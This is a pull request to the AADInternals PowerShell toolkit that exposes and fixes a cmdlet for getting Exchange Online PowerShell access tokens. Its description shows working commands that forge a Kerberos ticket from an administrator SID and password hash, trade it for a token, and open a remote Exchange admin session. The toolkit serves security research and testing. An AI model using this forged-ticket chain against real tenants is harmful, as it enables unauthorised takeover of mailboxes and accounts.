### PR TITLE
Added Exchange Online Powershell support

### DIFF
--- a/AADInternals.psd1
+++ b/AADInternals.psd1
@@ -160,6 +160,7 @@ DISCLAIMER: Functionality provided through this module are not supported by Micr
     "Get-AccessTokenForMSGraph"
     "Get-AccessTokenForPTA"
     "Get-AccessTokenForEXO"
+    "Get-AccessTokenForEXOPS"
     "Get-AccessTokenForSARA"
     "Get-AccessTokenForOneDrive"
     "Get-AccessTokenForOfficeApps"

--- a/AccessToken.ps1
+++ b/AccessToken.ps1
@@ -430,7 +430,7 @@ function Get-AccessTokenForEXOPS
     Process
     {
         # Office app has the required rights to Exchange Online
-        Get-AccessToken -Credentials $Credentials -Resource "https://outlook.office365.com" -ClientId "a0c73c16-a7e3-4564-9a95-2bdf47383716" -SAMLToken $SAMLToken -KerberosTicket $KerberosTicket -UserPrincipalName $UserPrincipalName -SaveToCache $SaveToCache -PRTToken $PRTToken -UseDeviceCode $UseDeviceCode 
+        Get-AccessToken -Credentials $Credentials -Resource "https://outlook.office365.com" -ClientId "a0c73c16-a7e3-4564-9a95-2bdf47383716" -SAMLToken $SAMLToken -KerberosTicket $KerberosTicket -SaveToCache $SaveToCache -PRTToken $PRTToken -UseDeviceCode $UseDeviceCode -Domain $Domain 
     }
 }
 

--- a/AccessToken_utils.ps1
+++ b/AccessToken_utils.ps1
@@ -1813,6 +1813,9 @@ function Get-AuthRedirectUrl
 		elseif($ClientId -eq "3b511579-5e00-46e1-a89e-a6f0870e2f5a") 
         {
             $redirect_uri = "https://windows365.microsoft.com/signin-oidc"
+        }elseif($ClientId -eq "a0c73c16-a7e3-4564-9a95-2bdf47383716") # EXO PS
+        {
+            $redirect_uri = "https://login.microsoftonline.com/common/oauth2/nativeclient"
         }
         
 


### PR DESCRIPTION
Exposed `Get-AADIntAccessTokenForEXOPS` cmdlet and fixed it.

Properly working with forged Kerberos tickets : 
```
Import-Module AADInternals

$kt=New-AADIntKerberosTicket -SidString "S-1-5-21-...-11111-500" -Hash "11111111111111111111111111"
$at = Get-AADIntAccessTokenForEXOPS -KerberosTicket $KerberosTicket -Domain $Domain 
$token = ConvertTo-SecureString "Bearer $at" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("adm@contoso.com", $token)

$ps =  New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri "https://ps.outlook.com/powershell-liveid?BasicAuthToOAuthConversion=true" -Credential $cred -Authentication Basic -AllowRedirection

Import-PSSession $ps -AllowClobber
```